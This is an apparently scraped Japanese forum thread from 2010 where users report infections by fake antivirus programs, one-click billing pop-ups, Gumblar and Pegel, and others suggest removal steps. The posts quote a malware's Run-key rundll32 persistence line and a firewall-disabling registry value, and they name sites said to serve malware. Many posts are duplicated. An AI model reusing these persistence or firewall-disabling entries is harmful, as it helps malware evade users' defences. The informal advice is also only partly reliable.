■Microsoft.Windows.SecurityCenter.FirewallOverride 1エントリ Security
(SBI $0C94D702) 設定
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\FirewallOverride (is not) dword:0
レジストリ変更
(以上の3件)を修正・削除後にも>>424の症状になる。
Windows復元ファイルを削除してレジストリクリーナーNTREGOPTをかけたら出なくなりました。
※avast4.8のスキャンでは何も検出されない
※この際ウィンドウズの更新(セキュリティ関係の)をしました。
※>>424のようになった時にWindowsファイアーウォール及びセキュリティセンターを起動しようとしても
代わりに「英語版のXP internet security unregistred version」が起動してしまいます。
※>>424の3行目
>その後にXPのセキュリティセンターが起動
この時ファイアーウォールとウイルス対策が無効になっていました。
もしかしたらニセの画面だったのかも
※とりあえずav.exeを終了するにはタスクマネージャー>プロセスの終了
426 :名無しさん@お腹いっぱい。:2010/03/19(金) 20:05:07
対策を教えて下さい。
アダルトサイトを見ていましたら、「あなたは会員になりました」みたいな
文言が表示されたので、何もせずにすぐにブラウザを終了しました。
その後、約3分毎に、『登録完了しました。有料アダルトサイトへのご登録
ありがとうございます。お客様は正規の手順を経て、当サイトにご登録され
ましたので、料金が発生しております。ご登録情報やお支払い方法、この画
面の削除方法など詳しい内容は右下の「確認ボタン」をクリックしてご確認
下さい。…この画面は、ご入金確認後に右下の「確認ボタン」をクリックす
れば削除できます。…』という文言等が表示された画面が表示されるように
なりました。
この画面を出なくするには、どうすれば良いのでしょうか?
OSはXPsp2です。
セキュリティソフトはNOD32 3.0.657.0が入っていますが
検知、隔離等はされていません。
なお、法律スレでも質問しますが、違法性についての質問ですので
マルチではありません。
よろしくお願い致します。
アダルトサイトを見ていましたら、「あなたは会員になりました」みたいな
文言が表示されたので、何もせずにすぐにブラウザを終了しました。
その後、約3分毎に、『登録完了しました。有料アダルトサイトへのご登録
ありがとうございます。お客様は正規の手順を経て、当サイトにご登録され
ましたので、料金が発生しております。ご登録情報やお支払い方法、この画
面の削除方法など詳しい内容は右下の「確認ボタン」をクリックしてご確認
下さい。…この画面は、ご入金確認後に右下の「確認ボタン」をクリックす
れば削除できます。…』という文言等が表示された画面が表示されるように
なりました。
この画面を出なくするには、どうすれば良いのでしょうか?
OSはXPsp2です。
セキュリティソフトはNOD32 3.0.657.0が入っていますが
検知、隔離等はされていません。
なお、法律スレでも質問しますが、違法性についての質問ですので
マルチではありません。
よろしくお願い致します。
427 :名無しさん@お腹いっぱい。:2010/03/19(金) 20:25:27
多分ワンクリウェア。スタートアップからサイト名っぽい項目の消せば治まる。
428 :名無しさん@お腹いっぱい。:2010/03/19(金) 21:02:47
>>426
とりあえずアダ被に同じような事例がある
ttp://bbs.higaitaisaku.com/cbbs.cgi?mode=al2&namber=105685&no=0&KLOG=9
ttp://bbs.higaitaisaku.com/cbbs.cgi?mode=al2&number=106033&rev=&no=0
たぶんrunエントリに↓こんなのがあるはず
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
[webbackf]
rundll32.exe "C:\ProgramData\backf\message.dll",_goMES@16 C:\ProgramData\backf\9XY1XX19.hta
レジストリから削除して再起動
起動後一応
C:\ProgramData\backf\9XY1XX19.hta
を削除
ただし9XY1XX19.htaは別名かもしれない
レジストリ等をいじるので自己責任で
とりあえずアダ被に同じような事例がある
ttp://bbs.higaitaisaku.com/cbbs.cgi?mode=al2&namber=105685&no=0&KLOG=9
ttp://bbs.higaitaisaku.com/cbbs.cgi?mode=al2&number=106033&rev=&no=0
たぶんrunエントリに↓こんなのがあるはず
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
[webbackf]
rundll32.exe "C:\ProgramData\backf\message.dll",_goMES@16 C:\ProgramData\backf\9XY1XX19.hta
レジストリから削除して再起動
起動後一応
C:\ProgramData\backf\9XY1XX19.hta
を削除
ただし9XY1XX19.htaは別名かもしれない
レジストリ等をいじるので自己責任で
429 :名無しさん@お腹いっぱい。:2010/03/19(金) 21:13:22
アダルトサイトにアクセスした前日くらいの日付で「システムの復元」の方が楽かな・・・
430 :426:2010/03/19(金) 21:47:54
431 :名無しさん@お腹いっぱい。:2010/03/19(金) 22:21:20
432 :名無しさん@お腹いっぱい。:2010/03/19(金) 22:55:10
今日発売のエロゲに仕込まれていたからでしょ。
433 :名無しさん@お腹いっぱい。:2010/03/19(金) 22:58:43
そういう事なのか、ありがとう
相当人気あるタイトルって事かぁ
相当人気あるタイトルって事かぁ
434 :430=426:2010/03/20(土) 19:46:39
435 :名無しさん@お腹いっぱい。:2010/03/20(土) 21:00:28
とあるURLを踏んだらノートン先生がウィルス検出し「駆除できませんでした」と表示がでてPCがまともに起動しなくなりました。
ノートンの表示を覚えていないのでどんなウィルスなのか分かりません。
再起動してもマウスポインタがずっと砂時計で何も操作できません。
今は別のPCから書き込んでいます。
そこで質問なんですが、そのURLを調べてくれる猛者が集うスレなどありますか?
ノートンの表示を覚えていないのでどんなウィルスなのか分かりません。
再起動してもマウスポインタがずっと砂時計で何も操作できません。
今は別のPCから書き込んでいます。
そこで質問なんですが、そのURLを調べてくれる猛者が集うスレなどありますか?
自己解決しました
437 :名無しさん@お腹いっぱい。:2010/03/20(土) 22:26:50
けっきょくなに踏んだの?
Gumblarだったみたい
セーフモードでシステムの復元してPCは操作できるようになったけど
それだけで駆除できたのか分からないから今確認中...
セーフモードでシステムの復元してPCは操作できるようになったけど
それだけで駆除できたのか分からないから今確認中...
439 :名無しさん@お腹いっぱい。:2010/03/21(日) 00:20:37
リカバリしたほうが疑心暗鬼で使うより精神的にもいいとおも
440 :名無しさん@お腹いっぱい。:2010/03/22(月) 09:32:36
>>424
昨夜自分もかかった
AntiSpyware/Antivirusの偽プログラムで一種で色んなバリエーションがあるようだ
>>424-425と似てる点違う点をあげると
・ファイアーウォールとウィルスガードが無効になり設定をいじれなくなる
・そして危険だ!解決するならこれらのファイルを削除しろ&登録しろと催促するソフトが起動するのも一緒
・自分の場合のそのソフトの名前は XP Smart Security
・Process Explorerで見知らぬプログラム発見 ave.exeというものだった
・とりあえず切るとXP Smart Securityも消えるがほかのソフトを起動させると復活しアラートの嵐
どうやら.exeに関連付けられてる様子
・Spybotでの検出結果は>>425と一緒、削除しても復活も同じ
・Ad-Awareは起動できなくなった
・ネットで調べようとブラウザを起動させると
“Internet Explorer (FireFox) alert. Visiting this site may pose a security threat to your system!”と
アラートが出て接続不可になる (ave.exeを切ると繋がる場合があった)
・Spybot、ウィルスバスター、AntiVirを試したが本体は発見できず
AntiVirではドライバが感染していると誤ったアラートを出してきた(復旧後チェックし直したら検出せず)
で結局自分は下記ページの手法で駆除しました
http://www.myantispyware.com/2010/03/19/how-to-remove-ave-exe-malware/
参考になれば幸い
昨夜自分もかかった
AntiSpyware/Antivirusの偽プログラムで一種で色んなバリエーションがあるようだ
>>424-425と似てる点違う点をあげると
・ファイアーウォールとウィルスガードが無効になり設定をいじれなくなる
・そして危険だ!解決するならこれらのファイルを削除しろ&登録しろと催促するソフトが起動するのも一緒
・自分の場合のそのソフトの名前は XP Smart Security
・Process Explorerで見知らぬプログラム発見 ave.exeというものだった
・とりあえず切るとXP Smart Securityも消えるがほかのソフトを起動させると復活しアラートの嵐
どうやら.exeに関連付けられてる様子
・Spybotでの検出結果は>>425と一緒、削除しても復活も同じ
・Ad-Awareは起動できなくなった
・ネットで調べようとブラウザを起動させると
“Internet Explorer (FireFox) alert. Visiting this site may pose a security threat to your system!”と
アラートが出て接続不可になる (ave.exeを切ると繋がる場合があった)
・Spybot、ウィルスバスター、AntiVirを試したが本体は発見できず
AntiVirではドライバが感染していると誤ったアラートを出してきた(復旧後チェックし直したら検出せず)
で結局自分は下記ページの手法で駆除しました
http://www.myantispyware.com/2010/03/19/how-to-remove-ave-exe-malware/
参考になれば幸い
441 :名無しさん@お腹いっぱい。:2010/03/22(月) 14:15:40
こんにちは、ここはセキュリティに詳しい方がいるようなので質問させてください。
ただいまウイルスと格闘中でほぼ大丈夫かとは思うのですが
また繋げられなくなるかも知れないので単刀直入にお伺いします。
今年になってyahooBB ADSL トリオモデム40M をvistaに繋いだのですが
ネットに繋ぐと数十分、ひどい時は数分間隔で
「不明なコンピューターが接続しようとしています。」
「接続を許可しますか?」
という内容の警告が発せられます。
以前XPを使っていた時はこういう内容の警告メッセージはなかったので
不安に感じています。
今まではXPのファイアーウォールが遮ってただけで
こういう不明なアクセスはこんなに頻繁にあるものなんでしょうか?
それともyahooBB、あるいは新しく交換した新型ADSLモデムに問題があるのでしょうか?
解かる方、または何か情報をご存知の方は是非教えてください。
現在は様子を見ながらネットに繋いでいる状態です。
大丈夫そうなら自分でもぐぐって調べてみますが
よろしくお願いしますm(_ _)m
ただいまウイルスと格闘中でほぼ大丈夫かとは思うのですが
また繋げられなくなるかも知れないので単刀直入にお伺いします。
今年になってyahooBB ADSL トリオモデム40M をvistaに繋いだのですが
ネットに繋ぐと数十分、ひどい時は数分間隔で
「不明なコンピューターが接続しようとしています。」
「接続を許可しますか?」
という内容の警告が発せられます。
以前XPを使っていた時はこういう内容の警告メッセージはなかったので
不安に感じています。
今まではXPのファイアーウォールが遮ってただけで
こういう不明なアクセスはこんなに頻繁にあるものなんでしょうか?
それともyahooBB、あるいは新しく交換した新型ADSLモデムに問題があるのでしょうか?
解かる方、または何か情報をご存知の方は是非教えてください。
現在は様子を見ながらネットに繋いでいる状態です。
大丈夫そうなら自分でもぐぐって調べてみますが
よろしくお願いしますm(_ _)m
442 :名無しさん@お腹いっぱい。:2010/03/22(月) 14:38:45
ルータは使ってないの?
443 :sage:2010/03/22(月) 20:11:48
昼間書き込んだ>>441です。
自分も>>424 >>440 の方と同じav.exeにやられてました。
あの後1時間ほど試しにネットに接続して調べ物などした後
確認の意味でノートン、スパイボット、Malwarebytes' Anti-Malware
の三つでフルスキャンして確認したところ、なんとか今回はウイルスを退治できたようです。
先の二人に補足で書いておくと侵入時はave.exeの名前で入ってきて
ファイアーウォールの無効化、ファイアーウォールの設定不可の
レジストリを書き加えた後でav.exeへと自分で名前を変えているようです。(実験済み)
症状も検出結果も先の二人と同様ですが、自分の場合はプロセスを
切っても切らなくてもネットへの接続が可能でした。
手順を踏むとファイアーウォールは掛けられるのですがそれも画面上の話で
確認した結果、内部処理的にはav.exeが動いた時点でファイアーウォールは無効化されていたようです。
自分も>>424 >>440 の方と同じav.exeにやられてました。
あの後1時間ほど試しにネットに接続して調べ物などした後
確認の意味でノートン、スパイボット、Malwarebytes' Anti-Malware
の三つでフルスキャンして確認したところ、なんとか今回はウイルスを退治できたようです。
先の二人に補足で書いておくと侵入時はave.exeの名前で入ってきて
ファイアーウォールの無効化、ファイアーウォールの設定不可の
レジストリを書き加えた後でav.exeへと自分で名前を変えているようです。(実験済み)
症状も検出結果も先の二人と同様ですが、自分の場合はプロセスを
切っても切らなくてもネットへの接続が可能でした。
手順を踏むとファイアーウォールは掛けられるのですがそれも画面上の話で
確認した結果、内部処理的にはav.exeが動いた時点でファイアーウォールは無効化されていたようです。
444 :名無しさん@お腹いっぱい。:2010/03/22(月) 21:41:15
bufferzone
というフォルダ下はウイルスが検索しないって聞いたんだけど本当?
それとは別に
mydoccument以外に入れとくと安全とかそんなの無い?
というフォルダ下はウイルスが検索しないって聞いたんだけど本当?
それとは別に
mydoccument以外に入れとくと安全とかそんなの無い?
445 :名無しさん@お腹いっぱい。:2010/03/22(月) 22:10:55
bufferzoneってサンドボックスか何かじゃないの?
446 :名無しさん@お腹いっぱい。:2010/03/22(月) 22:31:20
やっぱガセ?
ググるとこんなのはあるけどフォルダとしてどーとかは見当たらない
http://www.virtualization.info/jp/2010/03/trustware-bufferzone-pro-33020100304-3.html
でもウイルスが読み取るファイルって決まってるんだよね?
全件舐めてたらバレるし
例えば
windows\tempとかのフォルダにすると良いとかないの?
ググるとこんなのはあるけどフォルダとしてどーとかは見当たらない
http://www.virtualization.info/jp/2010/03/trustware-bufferzone-pro-33020100304-3.html
でもウイルスが読み取るファイルって決まってるんだよね?
全件舐めてたらバレるし
例えば
windows\tempとかのフォルダにすると良いとかないの?
447 :名無しさん@お腹いっぱい。:2010/03/22(月) 22:46:50
windows\tempは実際システムで使ってた^^
448 :名無しさん@お腹いっぱい。:2010/03/23(火) 00:47:46
http://www.garysinise.com/
ここのサイトをクリックしたら、トロイの木馬がって表示が出てしまった
慌ててサイトの接続切ったんですが・・・・大丈夫かな(汗)
怖くてPCが切れません。
ここのサイトをクリックしたら、トロイの木馬がって表示が出てしまった
慌ててサイトの接続切ったんですが・・・・大丈夫かな(汗)
怖くてPCが切れません。
449 :名無しさん@お腹いっぱい。:2010/03/23(火) 01:04:20
450 :名無しさん@お腹いっぱい。:2010/03/23(火) 07:23:16
451 :名無しさん@お腹いっぱい。:2010/03/24(水) 09:59:48
【使用OS】 XPpro sp3
【Microsoft Update(MU)の状態】最新です
【使用セキュリティソフトとバージョン】 avast
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】最新です
【スパイウェア対策ソフト】 spy-bot
【スパイウェア対策ソフトの更新は定期的に行なっているか】 最新でブラウザを免疫しています
【ルータの有無】 有 セキュリティレベルは最高にしています
今朝PCを立ち上げようとしたら、アカウント画面まで行かずにその直前でストップ
しばらく待ってみると何やらHDDにアクセスしてる様子、怖くなり強制再起動して
もう一度以前正常起動時の構成で立ち上げようとしたら一瞬ブルー画面になり強制再起動
デュアルOSなので2kの方で立ち上げたら、一応立ち上がったのですが何やら様子がおかしく
ブラウザの設定やフォルダの設定、アプリケーションの設定などが初期化されてる様子、
しかも何もしてないのにHDDのアクセスランプは点灯し続けている感じです
とりあえずシステムドライブ以外を全部外して、立ち上げてみると今度は立ち上がり
ウイルスチェックをするとWIndows memory.dmp にトロイの木馬が感染しているとありました
memory.dmpにウイルス?AVASTはよく誤動作をするので真偽はイマイチわかりませn
今は怖いのでとりあえずサブPCから書き込んでいます。
直前にやった行動といえば、acronis true image 11をインストールしたまますぐ再起動せずにしばらく放置
VP7コーデックのインストールと、Directxの最新ランタイムを入れたくらいです
ブラウザはfirefoXとoperaで色々行ったので良く覚えていないのですが2日ほど付けっぱなしにしていました
あと、数日前に400GのHDDを1.5Tと付け替えたくらいでしょうか
電源の容量は400WでHDDを5台つけているのでちょっとキツイかな?と思うのですが
CPUはE4300でGPUは8600GTSなのでさして電力も食わず、電源のメーカーはHECの400で12Vは14+15の29Aです
特に問題なく今までは動作していたのですが、電源のへたりが原因にしては挙動がおかしいし
それともシステムではなく他のドライブにウイルスが感染しておかしな動作をする事もあるのでしょうか?
452 :名無しさん@お腹いっぱい。:2010/03/24(水) 12:29:01
失礼、書き忘れておりましたが、ウイルスの種類はwin32:jomloon-Dと出ていました
別のオンラインスキャンで調べればよかったのですがうっかり削除してしまったので詳しい確認ができません
一応削除して再起動しても復活してる様子もないし、トレンドマイクロのオンラインスキャンでも問題無し
念のためERDNTで保存してあったレジストリを復元したのですが、やっぱりクリーンインストールした方がいいでしょうか?
別のオンラインスキャンで調べればよかったのですがうっかり削除してしまったので詳しい確認ができません
一応削除して再起動しても復活してる様子もないし、トレンドマイクロのオンラインスキャンでも問題無し
念のためERDNTで保存してあったレジストリを復元したのですが、やっぱりクリーンインストールした方がいいでしょうか?
453 :名無しさん@お腹いっぱい。:2010/03/24(水) 18:39:33
質問なんですが、一昨年の12月にメッセンジャーを経由するウィルスにかかりOSを再インストールしたのですが、
その際にどうしても残しておきたかったファイルを消える前に別のHDDに保存しておきました。
もしかしたらこのファイルにもウィルスが残っているのではと思いずっとそのままにしてあるのですが、
先日ためしにネットを切ってこのHDDをつなげスキャンしたところウィルスは発見されませんでした。
このファイルは普通にネットにつながっているPCにもどしても大丈夫でしょうか?
もしどうしてもダメならばネット等をつながない隔離した専用のPCを用意しようかと思います。
その際にどうしても残しておきたかったファイルを消える前に別のHDDに保存しておきました。
もしかしたらこのファイルにもウィルスが残っているのではと思いずっとそのままにしてあるのですが、
先日ためしにネットを切ってこのHDDをつなげスキャンしたところウィルスは発見されませんでした。
このファイルは普通にネットにつながっているPCにもどしても大丈夫でしょうか?
もしどうしてもダメならばネット等をつながない隔離した専用のPCを用意しようかと思います。
454 :名無しさん@お腹いっぱい。:2010/03/25(木) 10:53:41
上の方にも書かれてますがave.exeとかいう実行ファイル名の
マルウェアにやられました。
駆除の方はいろいろ調べてなんとかなりましたが・・・
これはFirefoxを使ってWeb見てるだけでも感染したみたいなんですが
Web見ただけでやられたのは実は初めてでした。
教えて欲しいことがあるんですが、
ActiveXも使わないようなブラウザで、ブラウザの何の仕組みを使うと
実行ファイルが勝手にダウンロードされて
さらにこちらに気づかずに勝手に実行されてしまうんでしょうか?
なんか専用のセキュリティツールでも入れればガードできるんでしょうが
極力ピンポイントにガードを抑えたいんです。
マルウェアにやられました。
駆除の方はいろいろ調べてなんとかなりましたが・・・
これはFirefoxを使ってWeb見てるだけでも感染したみたいなんですが
Web見ただけでやられたのは実は初めてでした。
教えて欲しいことがあるんですが、
ActiveXも使わないようなブラウザで、ブラウザの何の仕組みを使うと
実行ファイルが勝手にダウンロードされて
さらにこちらに気づかずに勝手に実行されてしまうんでしょうか?
なんか専用のセキュリティツールでも入れればガードできるんでしょうが
極力ピンポイントにガードを抑えたいんです。
455 :名無しさん@お腹いっぱい。:2010/03/25(木) 14:10:57
>>454
日頃から各ソフトウェアをしっかり更新していればある程度防げるけど
ピンポイントにってのは無理
ドライブバイダウンロードでぐぐるとわかるんじゃね
こういうの
http://itpro.nikkeibp.co.jp/article/COLUMN/20100309/345583/
日頃から各ソフトウェアをしっかり更新していればある程度防げるけど
ピンポイントにってのは無理
ドライブバイダウンロードでぐぐるとわかるんじゃね
こういうの
http://itpro.nikkeibp.co.jp/article/COLUMN/20100309/345583/
456 :名無しさん@お腹いっぱい。:2010/03/25(木) 14:15:44
457 :名無しさん@お腹いっぱい。:2010/03/26(金) 23:28:48
本文長すぎますと出てしまいましたので、
2回に分けて投稿させていただきます。
【使用OS】 「Windows XP SP3」
【Microsoft Update(MU)の状態】 「最新」
【使用セキュリティソフトとバージョン】 「Avira AntiVir Personal - Free Antivirus 9.0.0.18」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「最新」
【スパイウェア対策ソフト】 「なし」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「なし」
【ルータの有無】 「あり」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「ファイル'C:\Documents and Settings\ユーザー名\Local Settings\Temporary Internet Files\Content.IE5\U1UK58SO\right[1].htm'
にウイルスまたは不要プログラム'JS/Pegel.B.28'[virus]が含まれていました
実行されたアクション:
ファイルは'4c138ac5.qua'に移動されました。」
上記のような検出がファイル名それぞれ違って120個ほど1回の完全スキャンで出ました。
別PCから手打ちしているのでアドレス等が一部間違ってる可能性がありますが、
大まかなファイルの場所は上記の通りです。
2回に分けて投稿させていただきます。
【使用OS】 「Windows XP SP3」
【Microsoft Update(MU)の状態】 「最新」
【使用セキュリティソフトとバージョン】 「Avira AntiVir Personal - Free Antivirus 9.0.0.18」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「最新」
【スパイウェア対策ソフト】 「なし」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「なし」
【ルータの有無】 「あり」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「ファイル'C:\Documents and Settings\ユーザー名\Local Settings\Temporary Internet Files\Content.IE5\U1UK58SO\right[1].htm'
にウイルスまたは不要プログラム'JS/Pegel.B.28'[virus]が含まれていました
実行されたアクション:
ファイルは'4c138ac5.qua'に移動されました。」
上記のような検出がファイル名それぞれ違って120個ほど1回の完全スキャンで出ました。
別PCから手打ちしているのでアドレス等が一部間違ってる可能性がありますが、
大まかなファイルの場所は上記の通りです。
458 :名無しさん@お腹いっぱい。:2010/03/26(金) 23:30:23
●質問1
Pegelというウイルス名で検索したところ、
「Kaspersky Labs Japan、「Gumblar 亜種に続く、Pegel 対策に関する留意点」を告知」
というニュースサイトの記事で
「カスペルスキー製品では、現在出まわっている新型の脅威に対応しており、
同社では、感染の確認ならびに駆除を行うために、評価版の利用を促している。 」
という記述を見つけたのですが、
これはカスペルスキーの試用版を入れれば完全に駆除されるのでしょうか?
一部ニュースサイトではクリーンインストールするしかないといった記述もあったのですが、
できればウイルス対策ソフトで駆除したいと考えています。
●質問2
ウイルスバスターとAvira AntiVirで完全ウイルスチェックして
ウイルスが検出されなかったPCを現在使用していますが、
Avira AntiVirで2つのファイルが以下のような警告としてレポートに出ました。
C:\pagefile.sys
[警告] ファイルを開くことができませんでした。
[注意] このファイルは Windows システム ファイルです。
[注意] このファイルを開いてスキャンすることはできません。
C:\Windows\System32\drivers\sptd.sys
[警告] ファイルを開くことができませんでした。
上記ファイルは特にウイルス感染は気にしなくても大丈夫でしょうか?
(なお、ウイルスを発見して現在までの流れは以下の通りです。
本日ネサフ中Pegelウイルス検出→自PCにて完全ウイルスチェック→自PCで同ウイルス検出
→Avira AntiVirでウイルス修復(おそらく駆除と思われる)を実行→PC再起動
→再びPC完全ウイルスチェック→ウイルスは検出されず
→念のため、別PCよりこちらのスレに質問。)
長文すみません。ご教授よろしくお願いします。
Pegelというウイルス名で検索したところ、
「Kaspersky Labs Japan、「Gumblar 亜種に続く、Pegel 対策に関する留意点」を告知」
というニュースサイトの記事で
「カスペルスキー製品では、現在出まわっている新型の脅威に対応しており、
同社では、感染の確認ならびに駆除を行うために、評価版の利用を促している。 」
という記述を見つけたのですが、
これはカスペルスキーの試用版を入れれば完全に駆除されるのでしょうか?
一部ニュースサイトではクリーンインストールするしかないといった記述もあったのですが、
できればウイルス対策ソフトで駆除したいと考えています。
●質問2
ウイルスバスターとAvira AntiVirで完全ウイルスチェックして
ウイルスが検出されなかったPCを現在使用していますが、
Avira AntiVirで2つのファイルが以下のような警告としてレポートに出ました。
C:\pagefile.sys
[警告] ファイルを開くことができませんでした。
[注意] このファイルは Windows システム ファイルです。
[注意] このファイルを開いてスキャンすることはできません。
C:\Windows\System32\drivers\sptd.sys
[警告] ファイルを開くことができませんでした。
上記ファイルは特にウイルス感染は気にしなくても大丈夫でしょうか?
(なお、ウイルスを発見して現在までの流れは以下の通りです。
本日ネサフ中Pegelウイルス検出→自PCにて完全ウイルスチェック→自PCで同ウイルス検出
→Avira AntiVirでウイルス修復(おそらく駆除と思われる)を実行→PC再起動
→再びPC完全ウイルスチェック→ウイルスは検出されず
→念のため、別PCよりこちらのスレに質問。)
長文すみません。ご教授よろしくお願いします。
459 :名無しさん@お腹いっぱい。:2010/03/26(金) 23:36:41
1. クリーンインストール
2. virustotal
2. virustotal
460 :名無しさん@お腹いっぱい。:2010/03/27(土) 07:43:18
誤検出じゃないかな
461 :名無しさん@お腹いっぱい。:2010/03/29(月) 13:42:54
nua.exeがノートンで反応してくれないのですが、
どうしたらいいでしょうか?
タスクで消そうとしてもアクセス拒否でなんにも出来ない状態です。
どうしたらいいでしょうか?
タスクで消そうとしてもアクセス拒否でなんにも出来ない状態です。
462 :名無しさん@お腹いっぱい。:2010/03/29(月) 13:44:52
うぉ、テンプレ貼り忘れ失礼
【使用OS】xp
【Microsoft Update(MU)の状態】 最新
【使用セキュリティソフトとバージョン】ノートン最新
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 最新
【スパイウェア対策ソフト】spybot
【スパイウェア対策ソフトの更新は定期的に行なっているか】行っています。
【ルータの有無】なし
【使用OS】xp
【Microsoft Update(MU)の状態】 最新
【使用セキュリティソフトとバージョン】ノートン最新
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 最新
【スパイウェア対策ソフト】spybot
【スパイウェア対策ソフトの更新は定期的に行なっているか】行っています。
【ルータの有無】なし
463 :八頭 ◆YAGApwSaEw :2010/03/30(火) 07:21:44
>>462
該当ファイルを“右クリックコピー”して、適当なフォルダへ貼り付け→Symantecへコピーファイルを直にアップロード
■疑わしいファイルの提出 - Symantec Security Response 〔Upload a suspected infected file〕
*ファイルや圧縮ファイル〔Password無し、File数9個未満、10MB未満〕やtxtレポートで調査依頼の提出が出来ます
https://submit.symantec.com/websubmit/retail.cgi (記入例 ttp://i50.tinypic.com/29wn6ti.jpg )
http://pc11.2ch.net/test/read.cgi/sec/1269604867/7 を実施
http://pc11.2ch.net/test/read.cgi/sec/1269604867/9 を実施
該当ファイルを“右クリックコピー”して、適当なフォルダへ貼り付け→Symantecへコピーファイルを直にアップロード
■疑わしいファイルの提出 - Symantec Security Response 〔Upload a suspected infected file〕
*ファイルや圧縮ファイル〔Password無し、File数9個未満、10MB未満〕やtxtレポートで調査依頼の提出が出来ます
https://submit.symantec.com/websubmit/retail.cgi (記入例 ttp://i50.tinypic.com/29wn6ti.jpg )
http://pc11.2ch.net/test/read.cgi/sec/1269604867/7 を実施
http://pc11.2ch.net/test/read.cgi/sec/1269604867/9 を実施
464 :名無しさん@お腹いっぱい。:2010/04/01(木) 08:27:20
【使用OS】 「XP Home」
【Microsoft Update(MU)の状態】 「最新ではない(出来ない)」
【使用セキュリティソフトとバージョン】 「McAfee」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「自動更新」
【スパイウェア対策ソフト】 「McAfee」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「自動更新」
【ルータの有無】 「有」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「何も検出されませんでした」
【症状】「WindowsUpdateやセキュリティソフト系の公式サイトに接続が出来ません」
いつの頃からかわかりませんが、気付いたのは3月中です。
あらゆるブラウザソフトを用いても
以下に記載する特定のURLへ接続しようとすると
「このページは表示できません」と出て繋がらないようになりました。
・WindowsUpdate
http://windowsupdate.microsoft.com/
・エフセキュア
http://www.f-secure.com/
・トレンドマイクロ
http://jp.trendmicro.com/
http://virusbuster.jp/
・マカフィー
http://www.mcafee.com/
・シマンテック
http://www.symantec.com/
この他のサイトは問題なく閲覧できます。なぜか以上のサイトだけが繋がりません。
IE8、FireFox、chrome、Operaでセキュリティレベルを下げて接続を試みましたが
いずれも接続することができませんでした。ブラウザの上部に黄色いバーも出てきません。
同じルーターに接続している別PCではきちんとアクセスが出来ます。
原因の解る方がいらっしゃいましたらどうかご教授お願い致します。
【Microsoft Update(MU)の状態】 「最新ではない(出来ない)」
【使用セキュリティソフトとバージョン】 「McAfee」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「自動更新」
【スパイウェア対策ソフト】 「McAfee」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「自動更新」
【ルータの有無】 「有」
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「何も検出されませんでした」
【症状】「WindowsUpdateやセキュリティソフト系の公式サイトに接続が出来ません」
いつの頃からかわかりませんが、気付いたのは3月中です。
あらゆるブラウザソフトを用いても
以下に記載する特定のURLへ接続しようとすると
「このページは表示できません」と出て繋がらないようになりました。
・WindowsUpdate
http://windowsupdate.microsoft.com/
・エフセキュア
http://www.f-secure.com/
・トレンドマイクロ
http://jp.trendmicro.com/
http://virusbuster.jp/
・マカフィー
http://www.mcafee.com/
・シマンテック
http://www.symantec.com/
この他のサイトは問題なく閲覧できます。なぜか以上のサイトだけが繋がりません。
IE8、FireFox、chrome、Operaでセキュリティレベルを下げて接続を試みましたが
いずれも接続することができませんでした。ブラウザの上部に黄色いバーも出てきません。
同じルーターに接続している別PCではきちんとアクセスが出来ます。
原因の解る方がいらっしゃいましたらどうかご教授お願い致します。
自己解決しました。
466 :名無しさん@お腹いっぱい。:2010/04/07(水) 18:39:50
もし、ウイルスに感染してどうしようもなくなったPCに
USBメモリなり外付けHDDを挿して一部データを救出した場合に
救出したはずのデータやハードディスク自体にウイルスが感染することってあるんでしょうか?
autorun.infファイルとウイルスファイル(拡張子はexeとscrのみ?)のケースは調べたのですが
他にも例がある場合には教えて下さい。よろしくお願いします
USBメモリなり外付けHDDを挿して一部データを救出した場合に
救出したはずのデータやハードディスク自体にウイルスが感染することってあるんでしょうか?
autorun.infファイルとウイルスファイル(拡張子はexeとscrのみ?)のケースは調べたのですが
他にも例がある場合には教えて下さい。よろしくお願いします
467 :名無しさん@お腹いっぱい。:2010/04/16(金) 15:43:45
http://apr.2chan.net/dec/18/src/1271356396516.gif
これはGENOでしょうか?
これはGENOでしょうか?
468 :sage:2010/04/16(金) 18:08:26
【使用OS】 「mac osX(10.5.8)」
【Microsoft Update(MU)の状態】 −
【使用セキュリティソフトとバージョン】 「mac osXのファイアウォール 」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】「1ヵ月前」
【スパイウェア対策ソフト】 −
【スパイウェア対策ソフトの更新は定期的に行なっているか】 −
【ルータの有無】 有
【スキャンの結果】 「ケーブル抜いて、まだスキャンしていません」
ブックマークに登録してあるサイト(http://jakandjil.com/)に行ったら、
あやしい?サイトに飛ばされました。
(gescansecurity.org/?affid=318&subid=landing)
この現象ははじめてです。このサイトのウインドウを閉じようとすると
「http://gescansecurity.org windows security center
Virus,(virus.Win 32.Hidrag.a) was found on your computer!
Crik "OK" to install System Security Antivirus.」
とsafariのダイアログが表示され閉じれませんでしたので、safari強制終了。
セキュリティは、mac osXのファイアウォール。java scriptは可。
ウイルス、スパイウェアですか?
>>440のと同じでしょうか? mac osですけど。
ググってもgescansecurity.orgの情報がなかったので、
どうしたらよいかお願いします。
【Microsoft Update(MU)の状態】 −
【使用セキュリティソフトとバージョン】 「mac osXのファイアウォール 」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】「1ヵ月前」
【スパイウェア対策ソフト】 −
【スパイウェア対策ソフトの更新は定期的に行なっているか】 −
【ルータの有無】 有
【スキャンの結果】 「ケーブル抜いて、まだスキャンしていません」
